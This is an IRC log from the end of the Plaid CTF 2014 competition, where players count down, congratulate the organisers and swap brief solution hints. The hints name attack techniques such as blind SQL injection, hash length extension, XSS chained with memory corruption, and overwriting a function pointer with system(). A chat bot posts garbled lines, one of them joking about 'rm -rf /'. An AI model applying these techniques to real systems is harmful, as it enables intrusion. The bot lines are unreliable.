20:37 #pctf: <+frozencemetery> wtbw: weeeeeiiiiiiirdddd
20:37 #pctf: < dkohlbre> | (•□•) |
20:37 #pctf: < zoku> nah clockish, gdb is already installed but I can't use it over connectback anyways >_<
20:37 #pctf: < zoku> lol
20:37 #pctf: < ius> tylerni7: close ;)
20:37 #pctf: < tokki> lol
20:37 #pctf: <+tylerni7> ius: I know, I don't wanna give it away though :P
20:37 #pctf: < ius> :D
20:38 #pctf: < sven> it's not that hard anymore now :P
20:38 #pctf: <+ricky> zoku: Sorry, I was mistaken, apparently the machine is different from ezhp so things might be different
20:38 #pctf: < Gynvael> wtf changing the jackshit binary --;
20:38 #pctf: <+mserrano> Gynvael: it's the same, but no stack protector =\
20:38 #pctf: <+ricky> Not sure what to suggest other than getting a similar env setup or staring more to figure out why your addresses aren't matching up
20:38 #pctf: < _blasty_> holy fuck my heart is pounding through my chest
20:38 #pctf: < Gynvael> come on, we had the exploit almost working
20:38 #pctf: <+ricky> Hehe yeah, that was tight timing
20:38 #pctf: <+ricky> Gynvael: You still have time!
20:38 #pctf: < Gynvael> and now the layout of stack changed ;/
20:38 #pctf: <+ricky> Oh jackshit, never mind
20:39 #pctf: < zoku> yea, I've tried on debian and ubuntu ricky ;/
20:39 #pctf: <+mserrano> Gynvael: pm clockish
20:39 #pctf: <+ricky> Ah, sorry - we're starting a copy of the old one up I think
20:39 #pctf: < clockish> Gynvael: sorry! I'll get the old one back up
20:39 #pctf: <+tylerni7> new one should be strictly easier, but...
20:40 #pctf: < nopple> lol i was also right at the point where it might have hurt more than helped on it, but i started going forward with new version already...
20:40 #pctf: < geobot> just hurt firefox os's feelings on default ubuntu think yeah crowell you're going to be nice to be awesome
20:40 #pctf: < Beched> geobot != tomcr00se ?
20:40 #pctf: <+tylerni7> lol
20:41 #pctf: < tokki> lol
20:41 #pctf: < ryan-c> lol
20:41 #pctf: < ryan-c> hellman: WHAT DID YOU DO
20:42 #pctf: < tokki> lol
20:42 #pctf: < iZsh> you guys still haven't figured out what 0xffa is? ;-)
20:42 #pctf: < ciliated> reekee is not directory traversal?
20:42 #pctf: <+houqp_> Beched: you need to ask geobot
20:42 #pctf: < sven> it's really not hard :P
20:42 #pctf: <+tylerni7> ciliated: you can pm me
20:42 #pctf: < _blasty_> Who will solve the 0xFFA puzzle first ?
20:43 #pctf: < iZsh> yeah 0xffa is a CTF chall :)
20:43 #pctf: < _blasty_> :-)
20:43 #pctf: < arthurdent> it's a xor of two teams
20:43 #pctf: < sven> nope
20:43 #pctf: <+mserrano> some of us have already "solved"
20:43 #pctf: <+mserrano> :P
20:43 #pctf: < _blasty_> warm.
20:43 #pctf: < sven> close though.
20:43 #pctf: < paul_axe> hi, who can i ask about kpop?
20:43 #pctf: < AnthraX101> XOR? Like those who were in both before were not allowed in?
20:43 #pctf: < geobot> it did do it in?
20:43 #pctf: <+tylerni7> paul_axe: mserrano
20:43 #pctf: <+mserrano> paul_axe: me
20:43 #pctf: < sven> [22:34:59] <sdjakl> 0xffa = x+y for x,y (in) Z
20:43 #pctf: < sven> now find x and y!
20:43 #pctf: < Beched> paul_axe: O_O which team are you with?)
20:44 #pctf: < sdjakl> if its clearer I can use latex notation
20:44 #pctf: < _blasty_> :-)
20:44 #pctf: < paul_axe> Beched: solo ;)
20:44 #pctf: < Beched> =)
20:44 #pctf: < sven> another hint: sdjakl is part of 0xffa
20:44 #pctf: <+tylerni7> Beched: english plz
20:44 #pctf: < plaintext> it's gg for us I guess
20:44 #pctf: <+dickoff> but I hear addition is hard, how will I ever solve for x and y?
20:44 #pctf: < zoku> clockish: is nightmare NATed?
20:44 #pctf: < iZsh> dickoff: :)
20:45 #pctf: <+mserrano> <= 15 minutes
20:45 #pctf: < inter> zoku: no its under alcatraz
20:45 #pctf: < zoku> fuck
20:45 #pctf: < poppopret> do ppl score points often in the last couple of minutes?
20:46 #pctf: < iZsh> poppopret: when you're #1, murphy says yes
20:46 #pctf: < iZsh> when you're #2, murphy says no
20:46 #pctf: < plaintext> multiplication hint plox :P
20:46 #pctf: < sven> yeah, 1 second before the end ofc
20:46 #pctf: <+tylerni7> iZsh: or still says yes, and you move down to 3rd :(
20:46 #pctf: < zoku> what system is ezhp running on??
20:46 #pctf: < zoku> 32bit debian??
20:46 #pctf: < iZsh> tylerni7: heh yeah, i didn't think of this way ;-)
20:46 #pctf: < poppopret> OS X
20:47 #pctf: < hellman> Thx ppp for cool ctf (and teams), i think i'm off now :) gg
20:47 #pctf: <+mserrano> :) see ya hellman
20:47 #pctf: <+tylerni7> hellman: o/
20:47 #pctf: < corpille> any lasts minute hint on mtpox ?
20:47 #pctf: <+dickoff> hellman: o/
20:47 #pctf: < clockish> Gynvael: it's up at 1283
20:47 #pctf: < clockish> Gynvael: the port patch is the only difference
20:47 #pctf: < Adran> any chance web100 might be usable until the end? :(
20:47 #pctf: < Gynvael> thx
20:47 #pctf: < tokki> k lets chat i think i'm ready for the write ups
20:47 #pctf: < zoku> clockish: do you admin the ezhp box too??
20:47 #pctf: < clockish> Gynvael: super sorry
20:47 #pctf: < clockish> zoku: no
20:48 #pctf: < tokki> we're still stuck on crypto 20 ;)
20:48 #pctf: < geobot> and 20 minuteds
20:48 #pctf: <+ricky> 12 minutes left!
20:48 #pctf: < rray> geobot: hi
20:48 #pctf: < _blasty_> np: Jace Hall - LOL MONEY
20:49 #pctf: < sven> :>
20:49 #pctf: < Adran> ricky: poor web100, everyone seems to be just hammering it right now
20:49 #pctf: < geobot> for web100, we can some other people
20:49 #pctf: < sdjakl> sven: so do we tell em at timeout; or just wait for the writeups ;)
20:49 #pctf: < sven> sdjakl: timeout sounds good :)
20:49 #pctf: * ricky is rooting for DS to solve jackshit
20:49 #pctf: < sven> it's seriously obvious now
20:50 -!- mode/#pctf [+o mserrano] by ChanServ
20:50 -!- mserrano changed the topic of #pctf to: [Plaid CTF 2014 - play.plaidctf.com] 10 minutes left | $40 added to each cash prizes so far (from CHANCE card)
20:50 #pctf: < iZsh> ricky: we're still trying to solve 2 others :)
20:50 #pctf: < iZsh> might get one in time
20:50 #pctf: < iZsh> :)
20:52 #pctf: <+ricky> :-)
20:52 #pctf: < Guest68736> who can i ask for web100 ?
20:52 #pctf: < geobot> then does have to get in the video on web100 is so difficult
20:52 #pctf: <@mserrano> 8
20:52 #pctf: < Hero2Morow> what's the highest number of points possible?
20:52 #pctf: <+ricky> 7.73
20:52 #pctf: < mischa__> there is a web100?
20:52 #pctf: < geobot> web100?
20:52 #pctf: < dkohlbre> man this machine's clock is off by 3.5 minutes wtf
20:52 #pctf: < tokki> lol
20:52 #pctf: < Guest68736> yeah web100
20:52 #pctf: < poppopret> what time is it on the server's clock
20:53 #pctf: < Guest68736> who can i ask for it ?
20:53 #pctf: < Adran> there is a web100 when it decides to load
20:53 #pctf: <@mserrano> 7
20:53 #pctf: < poppopret> 7?
20:53 #pctf: < Guest68736> mserrano: can i ask you smt for web100? in private
20:53 #pctf: < geobot> i feel bad for web100?
20:54 #pctf: <@mserrano> 6
20:54 #pctf: < poppopret> more minutes?
20:54 #pctf: <@mserrano> yes
20:54 #pctf: < |x_x|> By the technological gods.
20:54 #pctf: < |x_x|> I nodded off.
20:54 #pctf: < |x_x|> >_<
20:54 #pctf: < LuckyY> but but chronosphere discharges in 8 minutes
20:54 #pctf: < Guest68736> someone i can pm for web100?
20:54 #pctf: < |x_x|> Dropped six places. Y_Y
20:54 #pctf: < tokki> lol the chronosphere
20:54 #pctf: < tokki> dat chronosphere
20:55 #pctf: <@mserrano> 5
20:55 #pctf: < |x_x|> Quick, everyone send me your keys. >_>
20:55 #pctf: < inter> trading keys
20:55 #pctf: < inter> dota2 keys for tf2 keys
20:55 #pctf: < geobot> so, tf2 is linked to sit on the edge of
20:55 #pctf: < inter> 1:1 ratio
20:55 #pctf: < yyyyyyy> |x_x|: http://www.dabeagle.com/images/old-golden-key.jpg
20:55 #pctf: < geobot> |x_x|: correct
20:55 #pctf: < Ymgve> blah, I could have done moscow if I had one more hour
20:55 #pctf: < poppopret> everyone refresh the hints page
20:55 #pctf: < phiber__> how much left?
20:55 #pctf: < inter> add my steam: pctfpls
20:55 #pctf: < Guest68736> someone i can pm for web100?
20:56 #pctf: < |x_x|> I've got a sanity check key up for swap. pst.
20:56 #pctf: < geobot> just read the story, basically they don't reuse keys from when we solved sanity check
20:56 #pctf: <@mserrano> 4min
20:56 #pctf: < poppopret> lol guest68736
20:56 #pctf: < Guest68736> i have the answer i need something else
20:56 #pctf: < inter> clockish: im waiting on your writeup
20:56 #pctf: < tokki> 4min 240seconds!
20:56 #pctf: < iago-x86> Well, I guess that's it
20:56 #pctf: < iago-x86> I'm not solving anything by then :)
20:56 #pctf: < inter> 4 minute 20 seconds
20:56 #pctf: < tsuro> iago-x86: same here :)
20:56 #pctf: < iago-x86> Damn you, blackjack!
20:56 #pctf: < iago-x86> tsuro: How'd you do?
20:56 #pctf: < inter> 420 blaze it
20:57 #pctf: <@mserrano> 3min
20:57 #pctf: < Ymgve> hope no one solves moscow
20:57 #pctf: < tokki> damn
20:57 #pctf: < tsuro> iago-x86: we're still 4th, crossing my fingers :)
20:57 #pctf: <@mserrano> Ymgve: I don't think anyone will :(
20:57 #pctf: < clockish> inter: heh, I'll just pm you the short version, other ppl can post real writeups :P
20:57 #pctf: < iago-x86> nice :)
20:57 #pctf: < tokki> tsuro: ftw!
20:57 #pctf: < wtbw> moscow got released a bit late it seems
20:57 #pctf: < _blasty_> j00 kn0w h4ck3rz lyk3 2 s3ll drugZ?
20:57 #pctf: < wtbw> downside of the board system
20:57 #pctf: < sven> we'd need another hour for moscow :/
20:57 #pctf: < iago-x86> tsuro: we're 36th, but with only 3 people who solved anything :)
20:58 #pctf: <+ricky> That's pretty impressive
20:58 #pctf: <@mserrano> 2 mi
20:58 #pctf: <@mserrano> n
20:58 #pctf: < wtbw> sven: if it was windows I might've managed it
20:58 #pctf: < wtbw> got a few more tools there :)
20:58 #pctf: < yyyyyyy> mserrano, what's a mi?
20:58 #pctf: < tomcr00se> i mean, 13th is better than 12th
20:58 #pctf: < wtbw> minute
20:58 #pctf: <@mserrano> yyyyyyy: meant minute, hit enter too early
20:58 #pctf: < asmoday> PENCILS DOWN GAME OVER
20:58 #pctf: < wtbw> tomcr00se: pft!
20:58 #pctf: < tokki> mserrano: lol
20:58 #pctf: < clockish> asmoday NOT YET
20:58 #pctf: < tsuro> iago-x86: yeah, we were far more than that
20:58 #pctf: <+ricky> Please pass your exam booklets to the front
20:58 #pctf: <+tylerni7> ricky: heh
20:58 #pctf: < chrissing> hahaha
20:59 #pctf: <@mserrano> 1 minute
20:59 #pctf: < iago-x86> I personally solved 7 challenges
20:59 #pctf: < tomcr00se> let me just submit my cheating stored keys brb one sec
20:59 #pctf: < geobot> brb - registering for the transposition cipher was hacktastic
20:59 #pctf: <+ricky> Who will submit the last key?
20:59 #pctf: < tsuro> iago-x86: we even have 3 students who get credits at our university if they play CTF competitions
20:59 #pctf: < iago-x86> Nice! :)
20:59 #pctf: <+tylerni7> tomcr00se: :P
20:59 #pctf: < iZsh> dammit ENOTIME
20:59 #pctf: <+cai_> almost over
20:59 #pctf: <+cai_> in few seconds
20:59 #pctf: < inter> tomcr00se: ill give you a cookie with raisins in it
20:59 #pctf: < sven> time for murphy now
20:59 #pctf: <@mserrano> o.o
20:59 #pctf: <+ricky> 10
20:59 #pctf: < _blasty_> 9
20:59 #pctf: < zoku> nnooooo
20:59 #pctf: < Ymgve> give tips for all tasks now pls
20:59 #pctf: <+ricky> 5
20:59 #pctf: < |x_x|> 5
20:59 #pctf: < Adran> 4
20:59 #pctf: <+ricky> 2
20:59 #pctf: <+ricky> 1
21:00 #pctf: < Adran> 3
21:00 #pctf: < |x_x|> 1
21:00 #pctf: <+ricky> 0
21:00 #pctf: < poppopret> 4
21:00 #pctf: < yyyyyyy> -1e100
21:00 #pctf: < poppopret> 2
21:00 #pctf: < zoku> nooo wayyy
21:00 #pctf: < Reinhart> -1
21:00 #pctf: < poppopret> 5
21:00 #pctf: < Adran> -1
21:00 #pctf: < poppopret> 6
21:00 #pctf: < rray> 2 minutes left? guess i should start on bronies now
21:00 #pctf: < wtbw> omg_not_a_real_key
21:00 #pctf: < Reinhart> -2
21:00 #pctf: <+dickoff> GG!
21:00 #pctf: < |x_x|> ln(1023)
21:00 #pctf: <@mserrano> game over
21:00 #pctf: <+ricky> Good game!
21:00 #pctf: < _blasty_> >>> "%x" % (0xf0f+0xeb)
21:00 #pctf: < _blasty_> 'ffa'
21:00 #pctf: < sdjakl> woooo
21:00 #pctf: < tomcr00se> GG FOLKS
21:00 #pctf: < Gynvael> GG
21:00 #pctf: <+cai_> GAME OVER
21:00 #pctf: < LuckyY> 502 Bad Gateway
21:00 #pctf: < chrissing> It was fun
21:00 #pctf: <+cai_> gg
21:00 #pctf: < LuckyY> :D
21:00 #pctf: < rray> gg
21:00 #pctf: < architekt> Good Game 8-)
21:00 #pctf: < poppopret> and 502 bad gateway!!
21:00 #pctf: < whois> good
21:00 #pctf: < iZsh> \o/
21:00 #pctf: < wtbw> thanks PPP :)
21:00 #pctf: < computerality> _blasty_: mind=blown
21:00 #pctf: < |x_x|> Now that it's all over. I'm going to spoil one of the challenges for you guys. Sanity Check's key was "poop"
21:00 #pctf: < geobot> didn't know that haven't solved sanity check key easily trackable by then :)
21:00 #pctf: < muchacho> wtf was the path in kpop?
21:00 #pctf: < x56> woop woop! gg and thanks :)
21:00 #pctf: < mischa__> nice ctf
21:00 #pctf: < iZsh> jeez
21:00 #pctf: < Adran> poppopret: yeah
21:00 #pctf: < tokki> gg :D
21:00 #pctf: < plaintext> GG
21:00 #pctf: < ius> Thanks!
21:00 #pctf: <+dickoff> thanks for playing everyone :)
21:00 #pctf: < plaintext> thanks for the ctf
21:00 #pctf: < plaintext> what was multiplication?
21:00 #pctf: < KT> ok guy, whats 38.55 * 1700?
21:00 #pctf: < inter> gg
21:00 #pctf: < Ymgve> great ctf!
21:00 #pctf: < iZsh> so yeah, 0xffa = f0f + e
21:00 #pctf: < khloe_k> thx PPP
21:00 #pctf: < x56> 100000
21:00 #pctf: < Otacon22> gg
21:00 #pctf: < tomcr00se> 100,000
21:00 #pctf: < iZsh> so yeah, 0xffa = f0f + eb
21:00 #pctf: < Gynvael> gg
21:00 #pctf: < corpille> 100000
21:00 #pctf: <@mserrano> 38.55 * 1700 was 100000
21:00 #pctf: < Ymgve> KT: 100000 or something, excel bug
21:00 #pctf: < plaintext> wat
21:00 #pctf: < plaintext> why
21:00 #pctf: < tokki> thanks for making such an awesome ctf
21:00 #pctf: < architekt> Nice Game PPP
21:00 #pctf: <@mserrano> because of an excel 2007 bug
21:00 #pctf: < warrick> GOOOD GAME, THANKS PPP
21:00 #pctf: < tomcr00se> what was _nightmares_
21:00 #pctf: < ltfish> thank you guys for this game!
21:00 #pctf: < tokki> NOW TIME FOR WRITE UPS
21:00 #pctf: < tokki> thanks PPP :D
21:01 #pctf: < tomcr00se> real python pwning with shellcode?
21:01 #pctf: < wtbw> graphs was my favourite
21:01 #pctf: < geobot> we used it on how the pwning
21:01 #pctf: < Gynvael> thanks PPP ;)
21:01 #pctf: < Gynvael> gz 0xffa
21:01 #pctf: < plaintext> why is it 100,000?
21:01 #pctf: < |x_x|> http://scienceblogs.com/goodmath/2007/10/02/the-excel-65535100000-bug/ Read up on the 38.55 * 1700
21:01 #pctf: < Pitr_> thanks PPP!
21:01 #pctf: < Guest26684> rendezvous cookie, what was the BEEF damnit
21:01 #pctf: < _blasty_> FOR DIZ GAME
21:01 #pctf: < iZsh> thx guys
21:01 #pctf: < Ymgve> what was trojaned in the gcc challenge?
21:01 -!- mserrano changed the topic of #pctf to: [Plaid CTF 2014 - play.plaidctf.com] GG; congrats 0xffa, Dragon Sector, MSLC | $40 added to each cash prizes so far (from CHANCE card)
21:01 #pctf: < bool_101> thanks PPP for a great game!
21:01 #pctf: <+tylerni7> Gynvael: you're welcome, nice job!
21:01 #pctf: < kris> GG
21:01 #pctf: < tokki> lol
21:01 #pctf: < comex> Ymgve: openssl
21:01 #pctf: <+awesie> http://lmgtfy.com/?q=65535+multiplication
21:01 #pctf: < moki> thanks for hosting this
21:01 #pctf: < plaintext> oh so it was trivia
21:01 #pctf: < plaintext> nice
21:01 #pctf: <+houqp_> Guest26684: it's the beef
21:01 #pctf: < |x_x|> Multiplication is hard is an old Excel Sheet bug.
21:01 #pctf: < inter> thanks to mserrano, awesie, dickoff, frozencemetery, gbarboza, houqp_, ricky, tylerni7, and clockish for awesome challenges
21:01 #pctf: < dkohlbre> ok bbos, what was the password, I got into the emulator but it told me the key was the password :/
21:01 #pctf: < iago-x86> Gynvael: Hey, looking forward to our debrief at work :)
21:01 #pctf: < tokki> LeaveRet had an awesome time :D
21:01 #pctf: < abuss> Writeup on web 100: http://sigint.ru/writeups/2014/04/13/plaidctf-2014-writeups/
21:01 #pctf: < geobot> did a writeup
21:01 -!- EdHunter [foobar@2-107-180-168-dynamic.dk.customer.tdc.net] has left #pctf []
21:01 -!- cai_ changed the topic of #pctf to: [Plaid CTF 2014 - play.plaidctf.com] IT'S OVER! | Survey: http://bit.ly/1ifQBOo | $40 added to each cash prizes so far (from CHANCE card)
21:01 #pctf: < ryan-c> so, did anyone solve rsa from scratch?
21:01 #pctf: < Adran> mserrano: thats terrible
21:01 #pctf: < clockish> tomcr00se: nightmares was writing to /proc/self/mem
21:01 #pctf: < poppopret> how'd you guys all do??
21:01 #pctf: < tokki> DAT MONIEZ
21:01 #pctf: < Gynvael> iago-x86: ;)
21:01 #pctf: <+dickoff> inter: you forgot cai_ !
21:01 #pctf: < abuss> (ignore the nuit du hack title, I don't know how2jekyll)
21:01 #pctf: <+frozencemetery> inter: :)
21:01 #pctf: < lavish> congrats ppp!
21:01 #pctf: < tomcr00se> clockish: omg duh :P...nice
21:01 #pctf: < lavish> classy chals as usual
21:01 #pctf: < Ymgve> comex: but openssl wasn't included, just gcc?
21:01 #pctf: < bool101> Grats 0xffa
21:02 #pctf: <+dickoff> I'm looking forward to people's writeups
21:02 #pctf: <@mserrano> tomcr00se: or use a code object!
21:02 #pctf: < ius> Thanks PPP!
21:02 #pctf: < Adran> Thanks for the ctf guys
21:02 #pctf: < robbje> GG, nice CTF, thank you for hosting
21:02 #pctf: <@cai_> congrats to the winners :)
21:02 #pctf: < ius> esp. bronies was insane
21:02 #pctf: < ius> :D
21:02 #pctf: <+dickoff> ius: congrats!
21:02 #pctf: < lavish> and grats to the winners
21:02 #pctf: <@cai_> GG all
21:02 #pctf: < comex> Ymgve: if you compile openssl with that gcc, it gets backdoored
21:02 #pctf: < _blasty_> BRONIES.
21:02 #pctf: < someone_> what was the wallet id for mtpox
21:02 #pctf: < jagger_> gg - really nice challenges - a lot of fun instead of going through 100 iterations of guessing
21:02 #pctf: < ius> so much xss/mem corr
21:02 -!- _bcc [~bcc@75-137-7-50.dhcp.nwnn.ga.charter.com] has left #pctf []
21:02 #pctf: < Guest71506> gg
21:02 #pctf: < iago-x86> I can't believe we didn't solve the tor level... we have two tor devs on our team! :)
21:02 #pctf: < Ymgve> comex: that's the theory but we could never find the backdoor
21:02 #pctf: <+awesie> dkohlbre: there was password to unlock the device, that password was the key
21:02 #pctf: < arthurdent> anyone want to make a googledox with all the writeups or something?
21:02 #pctf: < valis> wow, that was intensive - congrats 0xffa on bronies part 2
21:02 #pctf: < _blasty_> My captcha approach was suboptimal. I kept refreshing till I got 'Rarity'.
21:02 #pctf: <+tylerni7> iago-x86: hahahaha
21:02 #pctf: < Adran> what was the answer to polygon since I kept getting gateway issues?
21:02 #pctf: < _blasty_> Im gonna watch all of MLP now.
21:02 #pctf: <@mserrano> _blasty_: lol
21:02 #pctf: < sven> :D
21:02 #pctf: < iago-x86> _blasty_: haha, I did basically the same
21:02 #pctf: < lavish> someone_: I used group_concat and dumped the whole stuff
21:02 #pctf: < Adran> my little brony
21:02 #pctf: < tomcr00se> polygon was sql injection
21:02 #pctf: <+tylerni7> _blasty_: pony captcha is best captcha
21:02 #pctf: < Rexperience7> GJ Everyone
21:02 #pctf: <@mserrano> _blasty_: Ricky would refresh until he got Princess Celestia
21:02 #pctf: <+dickoff> iago-x86: what team are you on?
21:02 #pctf: < comex> Ymgve: i compiled openssl with the evil compiler and stock gcc 4.8.2, bindiff, easy to find the difference
21:02 #pctf: < dkohlbre> awesie: yes i know, i couldn't figure out how to get the password, I unlocked the device without it :P
21:02 #pctf: < Rexperience7> it was fun
21:02 #pctf: < Valodim> pony captcha kept me going ♥
21:03 #pctf: < sssssssss> what bug in web800?
21:03 -!- zzoru [6e23254c@gateway/web/freenode/ip.] has joined #pctf
21:03 #pctf: < iago-x86> dickoff: "Nate Delivers Breakfast" or "ndb"
21:03 #pctf: < whois> what is bronies2??
21:03 #pctf: <+awesie> dkohlbre: yeah, that is why i made the key the password :)
21:03 #pctf: < geobot> we used in the password
21:03 #pctf: < sven> sssssssss: wait for our writeup :)
21:03 #pctf: <+awesie> dkohlbre: you could get the password from the nvram
21:03 #pctf: < sssssssss> sure
21:03 #pctf: < comex> (first i tried bindiffing the compiler but it was compiled with two different compilers itself or something)
21:03 #pctf: < clockish> sven: we're all waiting for your writeup :)
21:03 #pctf: <@mserrano> whois: xss -> arb. file read -> mem corruption -> flag
21:03 -!- cimmi_ [1f2d47df@gateway/web/freenode/ip.] has joined #pctf
21:03 #pctf: <+ricky> sssssssss: XSS in ponies site, stack buffer overflow leading to XSS in otp checking binary on login site, combine to steal cookie on login site
21:03 #pctf: <+awesie> dkohlbre: blackberry only uses sha1 to hash their device password :(
21:03 #pctf: < dkohlbre> awesie: thats what I figured,but I couldn't find any docs on it, and manual inspection wasn't turning it up
21:03 #pctf: < Ymgve> SHA1 hash of password was in mvram for blackberry
21:03 #pctf: < Ymgve> nvram
21:03 #pctf: <+ricky> sssssssss: Then there was an internal web server with more memory corruption to exploit
21:03 #pctf: < whois> memory corruption on /home/bigson/bigson binary?
21:03 #pctf: < Adran> mserrano: what was polygon? i saw the injection stuff, but then gateway sploded. :(
21:04 #pctf: < abuss> Adran, http://sigint.ru/writeups/2014/04/13/plaidctf-2014-writeups/
21:04 #pctf: < Guest26684> arthurdent: ctftime.org can index em all, submit them there - https://ctftime.org/event/119/tasks/
21:04 #pctf: < [CISSP]HoLyVieR> For WhatApp, what SQL were we supposed to use that fits in 64 characters ?
21:04 #pctf: < tomcr00se> and what was weeee?
21:04 #pctf: < Ymgve> also: fun fact, if you delete the nvram file, you can access the phone and read the message without any password
21:04 #pctf: < iago-x86> Adran: Poly was a blind sqli
21:04 #pctf: < tomcr00se> Adran: sql injection
21:04 #pctf: < Beched> hey anybody
21:04 #pctf: <@mserrano> Adran: blind sql
21:04 #pctf: < mongo12> stack buffer overflow leading to XSS? how so?
21:04 #pctf: < Beched> pls show flag for web200
21:04 #pctf: < ronbarrey> looking for solution to web150
21:04 #pctf: < Adran> okay. yeah got to the sql injection. then gateway ate me.
21:04 #pctf: < Adran> cool
21:04 #pctf: < dkohlbre> Ymgve: did you find docs on how its stored? or just find a sha1 hash and roll with it
21:04 #pctf: < iZsh> ricky: dont spoil the writeups ;-)
21:04 #pctf: < iZsh> for bronies2
21:04 #pctf: < _blasty_> Im eh, not looking forward to do the full bronies writeup
21:04 #pctf: < _blasty_> lol
21:04 #pctf: < Adran> ronbarrey: sql injection to get flag
21:04 #pctf: < geobot> sql injection of rm -rf / sven: don't die
21:04 #pctf: < lavish> 23:01 < abuss> Writeup on web 100: http://sigint.ru/writeups/2014/04/13/plaidctf-2014-writeups/
21:04 #pctf: < lavish> change the page title
21:04 #pctf: < lavish> :P
21:04 #pctf: < Adran> abuss: thanks
21:04 #pctf: < Ymgve> dkohlbre: deleted original nvram, set a new password with "test", looked thru nvram for suspicious areas
21:04 #pctf: < rray> what was mtpox
21:04 #pctf: < Ymgve> the rest was thanks to google(tm) hash brute forcing
21:05 #pctf: < tomcr00se> so i had rop on harry_potter...what next?
21:05 #pctf: < abuss> lavish, <abuss> (ignore the nuit du hack title, I don't know how2jekyll)
21:05 #pctf: < abuss> hehehe
21:05 #pctf: < dkohlbre> Ymgve: did the exact same things... I'll take another look at my diff
21:05 #pctf: < dkohlbre> thanks
21:05 #pctf: < [CISSP]HoLyVieR> rray: mtpox was hash length extension + sqli
21:05 #pctf: < lavish> abuss: ooops
21:05 #pctf: <+ricky> iZsh: Sure thing, looking forward to reading
21:05 #pctf: < iago-x86> rray: mtpox was hash extension attack
21:05 #pctf: < iago-x86> google it, you'll find my blog as the second result. :)
21:05 #pctf: < yyyyyyy> so what was 20? :D
21:05 #pctf: < Beched> halphow2js FLAG pls, need to compare
21:05 #pctf: < bool101> yes what was the solution to harry_potter
21:05 #pctf: < rray> ahh, i was nowhere near solving mtpox :P
21:05 #pctf: < abuss> tomcr00se, how the hell did you get halphow2js so fast? 0.0
21:05 #pctf: < Ymgve> sooo was graphs supposed to be so easy to solve? (all private key vertices had a suspiciously low degree)
21:05 #pctf: <@mserrano> Ymgve: yes
21:06 #pctf: < tomcr00se> abuss: i have mad js skills :P
21:06 #pctf: < wtbw> Ymgve: treat it as a system of linear equations
21:06 #pctf: <@mserrano> Ymgve: you can just do Gaussian elimination and get a flag
21:06 #pctf: < abuss> well, better question, how were you supposed to get halphow2js :P
21:06 #pctf: < |x_x|> Time to start doing some writeups on what few I could do.
21:06 #pctf: < Valodim> lol graphs was awesome
21:06 -!- javex [javex@2a01:7e00::f03c:91ff:fe70:76f8] has left #pctf []
21:06 #pctf: < Ymgve> wtbw: fuck that, count degrees, see where the jump is
21:06 #pctf: < clockish> Beched: w00t_i_are_mastar_web_hackar
21:06 #pctf: < Valodim> privkey.add(node[0])
21:06 #pctf: < Valodim> bam
21:06 #pctf: < mongo12> how do you get XSS out of the stack overflow, for bronies1? wtf
21:06 #pctf: < robbje> any writeup on zfs?
21:06 -!- mode/#pctf [-o cai_] by cai_
21:06 #pctf: < whois> mserrano // how possible memory corruption bigson?
21:06 #pctf: < lavish> iago-x86: lol thank you! I used your hash_extender to solve mtpox!
21:06 #pctf: < Beched> clockish: thanks
21:06 #pctf: < tomcr00se> also, i shamefully failed at hudak
21:06 #pctf: < Ymgve> there was like no vertices with degrees between 20 and 30
21:06 #pctf: < upb> [CISSP]HoLyVieR: but what do you extend b:0; to to get anything other than bool(false) ? :P
21:06 #pctf: < lavish> iago-x86: that program rulez
21:06 #pctf: < zoku> who wrote ezhp?
21:06 #pctf: <@mserrano> zoku: I did
21:06 #pctf: < tomcr00se> mserrano: i am so bad at your problems, paris and hudak
21:06 #pctf: < sven> heh, zfs was fun. aDR4eA solved that one in ~10 minutes :D
21:06 #pctf: < wtbw> Ymgve: oh, sneaky!
21:06 -!- keidii [~niepodam@] has joined #pctf
21:06 #pctf: < Beched> was there any flag like flag{_0r1g1nally_t1m3_1$_running_0ut_} ??
21:06 #pctf: < geobot> i need to add more during the flag hack all the doors at once and sweaty bodies everywhere aswell
21:06 #pctf: < keidii> .
21:06 #pctf: <+cai_> >.>
21:06 #pctf: < zoku> ah, was I almost there mserrano?
21:07 #pctf: < [CISSP]HoLyVieR> upb: The string is reversed before being hashed
21:07 #pctf: <@mserrano> zoku: yes
21:07 #pctf: < robbje> sven: how? i didn't get it after 10h
21:07 #pctf: < wtbw> Ymgve: not a generic break though!
21:07 #pctf: < dkohlbre> where was the write/overflow in kappa? I had like 3 crash bugs and some arbitrary reads... but no writes
21:07 #pctf: * wtbw idealist
21:07 #pctf: <+dickoff> tomcr00se: paris was Frisk0's
21:07 #pctf: < whois> mserrano // bigson binary has corruption vuln?
21:07 #pctf: <@mserrano> tomcr00se: paris isn't mine - I did test it though
21:07 #pctf: < zoku> what system is it running on mserrano?
21:07 #pctf: < iago-x86> When I saw it was hash extension, I considered adding a bug to hash_extender ;)
21:07 #pctf: < jix> using a SAT solver also worked fine to recover the private key for a given graph pubkey
21:07 #pctf: <+ricky> dickoff: kappa was type confusion (dickoff wrote it)
21:07 #pctf: < zoku> really curious why it's not working
21:07 #pctf: < iago-x86> I'm curious how many downloads I got this weekend
21:07 #pctf: < keidii> anyone can spoil details on bbos ?
21:07 #pctf: < wtbw> Paris was nice
21:07 #pctf: < Ymgve> wtbw: yeah, I thought about if there was a generic solution but too busy to follow it up
21:07 #pctf: < [CISSP]HoLyVieR> upb: and b:1; ... garbage .... b;0 deserialize give "true"
21:07 #pctf: <+ricky> dickoff: Sorry, that was for dkohlbre
21:07 #pctf: < lavish> iago-x86: lol
21:07 #pctf: < upb> [CISSP]HoLyVieR: oh hmm
21:07 #pctf: <@mserrano> zoku: 64-bit debian ami, using the i386 libraries from multiarch
21:07 #pctf: < Ymgve> is there a way to solve rendezvous without recompiling Tor?
21:07 #pctf: < rray> so.. whatscat, what was the solution?
21:07 #pctf: < Frisk0> I'm glad you liked Paris :)
21:07 #pctf: < dkohlbre> ricky: yeah, i just wasn't finding any writes I could control, ah well
21:07 -!- mode/#pctf [+v Frisk0] by mserrano
21:07 #pctf: < tomcr00se> rray: sqli in username, or probably dns magic
21:08 #pctf: < AnthraX101> Serialize all the things!
21:08 #pctf: < choppers> dkohlbre: write to the art, overwrite the inspect() pointer to be system()
21:08 #pctf: < wtbw> Paris is the sort of thing that makes me want to code better analysis tools
21:08 #pctf: <+dickoff> dkohlbre: fill up your pokemon with kakuna, go catch a charizard, the art struct will now overflow the function pointer.
21:08 #pctf: < iago-x86> Finding system() was the hard part
21:08 #pctf: < zoku> ah, thanks mserrano
21:08 #pctf: < iago-x86> Well, not really
21:08 #pctf: < dkohlbre> choppers: goddammit im an idiot, I did that
21:08 #pctf: < oceanx_> damn I just solved nightmares :<
